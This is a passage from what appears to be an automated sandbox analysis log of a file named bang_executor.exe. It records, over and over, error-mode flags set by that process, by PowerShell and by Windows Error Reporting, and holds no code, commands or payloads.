          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
